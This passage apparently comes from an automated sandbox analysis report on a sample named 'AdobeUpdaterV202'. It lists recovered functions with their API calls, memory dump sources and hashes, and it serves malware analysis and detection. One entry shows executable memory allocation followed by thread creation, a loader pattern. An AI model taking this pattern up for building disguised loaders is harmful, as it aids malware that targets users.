                                  • __EH_prolog3.LIBCMT ref: 00E920FA
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00E92104
                                  • int.LIBCPMT ref: 00E9211B
                                    • Part of subcall function 00E92653: std::_Lockit::_Lockit.LIBCPMT ref: 00E92664
                                    • Part of subcall function 00E92653: std::_Lockit::~_Lockit.LIBCPMT ref: 00E9267E
                                  • codecvt.LIBCPMT ref: 00E9213E
                                  • std::_Facet_Register.LIBCPMT ref: 00E92155
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00E92175
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E92182
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                  • String ID:
                                  • API String ID: 2133458128-0
                                  • Opcode ID: 631ac4dd8291474176b93c27c3091ba7503135ef2a1ec348e8ff0578a2ae8869
                                  • Instruction ID: c7a1a1dd01ed935090d53fff52c4178ea93c6eb337942c61fe89ceb05fdc7196
                                  • Opcode Fuzzy Hash: 631ac4dd8291474176b93c27c3091ba7503135ef2a1ec348e8ff0578a2ae8869
                                  • Instruction Fuzzy Hash: EB01CC75901219ABCF05EBA4C816AAEB7A6BF84714F24550DF6107B292DFB09E06DB80
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00E9218F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00E92199
                                  • int.LIBCPMT ref: 00E921B0
                                    • Part of subcall function 00E92653: std::_Lockit::_Lockit.LIBCPMT ref: 00E92664
                                    • Part of subcall function 00E92653: std::_Lockit::~_Lockit.LIBCPMT ref: 00E9267E
                                  • ctype.LIBCPMT ref: 00E921D3
                                  • std::_Facet_Register.LIBCPMT ref: 00E921EA
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00E9220A
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E92217
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                  • String ID:
                                  • API String ID: 2958136301-0
                                  • Opcode ID: 283e1cf5dd67dd36751f8c791565e7c8611ca8b02248a9161dbb5b581278647f
                                  • Instruction ID: 91728cdd243ddeab66470ca811867104f4ec1010a30df09e26884fa2be5f5f50
                                  • Opcode Fuzzy Hash: 283e1cf5dd67dd36751f8c791565e7c8611ca8b02248a9161dbb5b581278647f
                                  • Instruction Fuzzy Hash: 9E01DE7590011AABCF05EBA0C806ABEB7F5BF84714F24140DE5107B2E2DFB09E05DB91
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00E97871,00E95E40,00E94F12), ref: 00E97888
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E97896
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E978AF
                                  • SetLastError.KERNEL32(00000000,00E97871,00E95E40,00E94F12), ref: 00E97901
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: d8ac672223cf029f9f391a8f1826e9ed333e98190f204624b6d868c5b31a7dc0
                                  • Instruction ID: f6972bd55d8e0f02485ad70eff497f6d264fa5713332d5992deaa56a814f47d6
                                  • Opcode Fuzzy Hash: d8ac672223cf029f9f391a8f1826e9ed333e98190f204624b6d868c5b31a7dc0
                                  • Instruction Fuzzy Hash: 1201F53232C2265EEEB82778AC8D59A3A94FF023B5730222EF420711E1EF514C19A194
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00EAC2E6), ref: 00EAC20B
                                    • Part of subcall function 00EAC151: _Deallocate.LIBCONCRT ref: 00EAC1EC
                                  • CreateThread.KERNEL32(00000000,00000000,00000188,00EB7030,00000000,00000000,?,?,00EAC2E6), ref: 00EAC23F
                                  • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00EAC2E6), ref: 00EAC24B
                                  • CloseHandle.KERNEL32(00000000,?,?,00EAC2E6), ref: 00EAC252
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AllocCloseCreateDeallocateHandleObjectSingleThreadVirtualWait
                                  • String ID: ole
                                  • API String ID: 440434604-1213916275
                                  • Opcode ID: 6463a8d50277f3c4b53054591b0db264c8906deacfc08482ce9ad8c93e83a081
                                  • Instruction ID: 1633923686453f40df89e3ac8e856e3ca609d198f55b319506146c2214cbcf21
                                  • Opcode Fuzzy Hash: 6463a8d50277f3c4b53054591b0db264c8906deacfc08482ce9ad8c93e83a081
                                  • Instruction Fuzzy Hash: 8EF0827620511C7FD15137639C89EBB3A6DDB8B7E5F520110FA06A55828A15380642B5
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00EAB0F9,000000FF,?,00E9C0CF,?,?,00E9C0A3,00000000), ref: 00E9C174
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00000000,00EAB0F9,000000FF,?,00E9C0CF,?,?,00E9C0A3,00000000), ref: 00E9C186
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00EAB0F9,000000FF,?,00E9C0CF,?,?,00E9C0A3,00000000), ref: 00E9C1A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 9e229afa4fc9a4470e47be03d561758e96cc23e5629a0179a35073cb1312d854
                                  • Instruction ID: bb6b09f96bef3c88e57e23191e3fb0e6d7a9d2adabeaad535894d1db3088787c
                                  • Opcode Fuzzy Hash: 9e229afa4fc9a4470e47be03d561758e96cc23e5629a0179a35073cb1312d854
                                  • Instruction Fuzzy Hash: 0001D671A44759FFDB119F92DC49FAEBBB9FB49B14F000125F812B26E0DB74A804CA90
                                  APIs
                                  • __alloca_probe_16.LIBCMT ref: 00EA2A68
                                  • __alloca_probe_16.LIBCMT ref: 00EA2B29
                                  • __freea.LIBCMT ref: 00EA2B90
                                    • Part of subcall function 00EA1DC1: HeapAlloc.KERNEL32(00000000,00E91FA6,?,?,00E957EA,?,?,?,00000000,?,00E917E2,00E91FA6,?,?,?,?), ref: 00EA1DF3
                                  • __freea.LIBCMT ref: 00EA2BA5
                                  • __freea.LIBCMT ref: 00EA2BB5
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                  • String ID:
                                  • API String ID: 1096550386-0
                                  • Opcode ID: 262cbc630ecd011e40cbb978b0bc4be5d0e54ed5acc6107064434bcfd49b5395
                                  • Instruction ID: f21556953c3f8fd1f0d1f7f7cf5021f05883ed1c0520c5149daa706a90068683
                                  • Opcode Fuzzy Hash: 262cbc630ecd011e40cbb978b0bc4be5d0e54ed5acc6107064434bcfd49b5395
                                  • Instruction Fuzzy Hash: B251B172600216ABEF249E68CC81EBB3BE9EF4A714B15156CFE04FA250E731ED108760
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00E93BD6
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00E93BE1
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00E93C4F
                                    • Part of subcall function 00E93D32: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E93D4A
                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00E93BFC
                                  • _Yarn.LIBCPMT ref: 00E93C12
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                  • String ID:
                                  • API String ID: 1088826258-0
                                  • Opcode ID: 809b95c57fe1593d251b20f8fba7608a82ced9547860faeb987fec05f62fbbef
                                  • Instruction ID: ad467c95ae187b574e469a0cba65983ef70841170de1555fa9eba367979a8733
                                  • Opcode Fuzzy Hash: 809b95c57fe1593d251b20f8fba7608a82ced9547860faeb987fec05f62fbbef
                                  • Instruction Fuzzy Hash: A601BCB5A011159BCF0AEB30C85593CBBB5BF99740B141009E80277391CF74AF02DB85
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0BA6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0BB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: $
                                  • API String ID: 885266447-2088381004
                                  • Opcode ID: f5204038756f00fa8ba6baa6557752d8a6f12e633af3e82672063c613825e01c
                                  • Instruction ID: 99016b8ebf2c8504ef4e6be0c4a090a0898f86758066c096f274c117c69e6c97
                                  • Opcode Fuzzy Hash: f5204038756f00fa8ba6baa6557752d8a6f12e633af3e82672063c613825e01c
                                  • Instruction Fuzzy Hash: B7515071A00249AFCF14CF98C991EEEBBB2EB4E358F149159E955AB351D330AE41CB60
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00E92398
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00E923A5
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E923E2
                                    • Part of subcall function 00E93CCD: _Yarn.LIBCPMT ref: 00E93CEC
                                    • Part of subcall function 00E93CCD: _Yarn.LIBCPMT ref: 00E93D10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                  • String ID: bad locale name
                                  • API String ID: 482894088-1405518554
                                  • Opcode ID: fcf6b5267e7e202a555d2c9f44c868e3de55b8ae9aa633b8caeced8c7c0fabaf
                                  • Instruction ID: 3be9b361b0d64d8e7ca3b2d819bf692db5bacc8592bf837a4f9b67e70ecaff5a
                                  • Opcode Fuzzy Hash: fcf6b5267e7e202a555d2c9f44c868e3de55b8ae9aa633b8caeced8c7c0fabaf
                                  • Instruction Fuzzy Hash: 3E0180715057849FCB309FAA948158AFEE0BF29350750996FE18DA7B02C770A600CBA9
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00EB4FF0,00000000,00000800,?,00E98973,00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue), ref: 00E989CF
                                  • GetLastError.KERNEL32(?,00E98973,00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue,00000000,?,00E9792D), ref: 00E989D9
                                  • LoadLibraryExW.KERNEL32(00EB4FF0,00000000,00000000,?,00EB4FF0,?,?,?,00E916D9,?,00E916D9,?), ref: 00E98A01
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID: api-ms-
                                  • API String ID: 3177248105-2084034818
                                  • Opcode ID: 84ce26be4dcc0660c851b7e5e8562f95cae44515eaec31e0b4352ce1ccaa0cd0
                                  • Instruction ID: 31fd68b75579fa293d3592454813e49ae0ad0d5cb65f2e3f8243dd5abbac5ceb
                                  • Opcode Fuzzy Hash: 84ce26be4dcc0660c851b7e5e8562f95cae44515eaec31e0b4352ce1ccaa0cd0
                                  • Instruction Fuzzy Hash: C5E04870244344BFEF105F62DE46B583E569F17B54F145021FA0DF84F1EBA1E8558584
                                  APIs
                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,00000000), ref: 00E9FBF1
                                    • Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E9FE4C
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E9FE94
                                  • GetLastError.KERNEL32 ref: 00E9FF37
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 2112829910-0
                                  • Opcode ID: b41360838bc8659674034152e40ecd5ca63bdc2f158d22179df145c0c382c0f5
                                  • Instruction ID: 9c2bfa02b2f389c3bd55a233e39d1ff2d01f433db526e39ad25b82547affd2a1
                                  • Opcode Fuzzy Hash: b41360838bc8659674034152e40ecd5ca63bdc2f158d22179df145c0c382c0f5
                                  • Instruction Fuzzy Hash: 26D146B5E102489FCF15CFA8D880AEDBBB5FF09314F18856AE855FB251DB30A942CB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: a727e4805c7e572793a6957c6b3ce4900fb1ff0754272355039a35bb5d1bef4c
                                  • Instruction ID: 0c3b67a63ff3185d88dc2aeb0f5db1604c564f7db920e83457e4bd7c9e4437b6
                                  • Opcode Fuzzy Hash: a727e4805c7e572793a6957c6b3ce4900fb1ff0754272355039a35bb5d1bef4c
                                  • Instruction Fuzzy Hash: 24511472618602AFDF298F55C841BBE77A1FF40314F18212DE88177291E7B0EE88C790
                                  APIs
                                    • Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0
                                  • GetLastError.KERNEL32 ref: 00EA4074
                                  • __dosmaperr.LIBCMT ref: 00EA407B
                                  • GetLastError.KERNEL32(?,?,?,?), ref: 00EA40B5
                                  • __dosmaperr.LIBCMT ref: 00EA40BC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 1913693674-0
                                  • Opcode ID: 58b0d9051673a7034df07c333ef70170f666d749418cd7a2ddbed93ae0001ffe
                                  • Instruction ID: 8dd3020a7f8f4995fd50c96739f1cd520e9f373256de9073a9dd46602ca9ca56
                                  • Opcode Fuzzy Hash: 58b0d9051673a7034df07c333ef70170f666d749418cd7a2ddbed93ae0001ffe
                                  • Instruction Fuzzy Hash: BC21D8B1600305AFCB20AF719DC186BB7EDEF8A3647009518FA25BB591D7B1FC509752
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a436285c5a8482067bd8b11467ddaf33dc4d6d1a03e855b040c342a2b88276c
                                  • Instruction ID: 1d5a5a7442404c01dcb086e8b468368d98cd509a68ecbbac4890636fd9e720fc
                                  • Opcode Fuzzy Hash: 2a436285c5a8482067bd8b11467ddaf33dc4d6d1a03e855b040c342a2b88276c
                                  • Instruction Fuzzy Hash: 21216231604205AF9F20EF61AE8197FB7EAEF453687109514F925B7152E770EC50A760
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 00EA4FAE
                                    • Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA4FE6
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA5006
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 158306478-0
                                  • Opcode ID: d30204814b506fab52d977ffb80f47f1a25403883c329681581ff446a6abe832
                                  • Instruction ID: fccb7507101f296c6a4d6a636527276f6ff1960b8d7486d5ce9c2838a1e76f99
                                  • Opcode Fuzzy Hash: d30204814b506fab52d977ffb80f47f1a25403883c329681581ff446a6abe832
                                  • Instruction Fuzzy Hash: FD11C4B66066157FAA2127765CCACBF6DECDF9F3947102424F502B9101EA64FE0045B1
                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000), ref: 00EA93EC
                                  • GetLastError.KERNEL32(?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000,00000000,?,00EA0512,00000000), ref: 00EA93F8
                                    • Part of subcall function 00EA93BE: CloseHandle.KERNEL32(FFFFFFFE,00EA9408,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000,00000000), ref: 00EA93CE
                                  • ___initconout.LIBCMT ref: 00EA9408
                                    • Part of subcall function 00EA9380: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EA93AF,00EA81BE,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000), ref: 00EA9393
                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000), ref: 00EA941D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: ecd164d1deb0304c2a25974c7b04e45db12443a944d2cd0cffb3827c61d74d61
                                  • Instruction ID: 205d96b35783901114113a6298e81ec997b869b9955be43ace55178f2a52dea1
                                  • Opcode Fuzzy Hash: ecd164d1deb0304c2a25974c7b04e45db12443a944d2cd0cffb3827c61d74d61
                                  • Instruction Fuzzy Hash: 43F0303A401118BFCF221FA5DC049CD3F6BFF4E3A0F005010FA19A9171C632A921EB90
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0C1D
                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,00EA0966,00000001,00000000,00E931FD,00000000,?,?,00000000,?,?,00EA0DE9), ref: 00EA0CA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
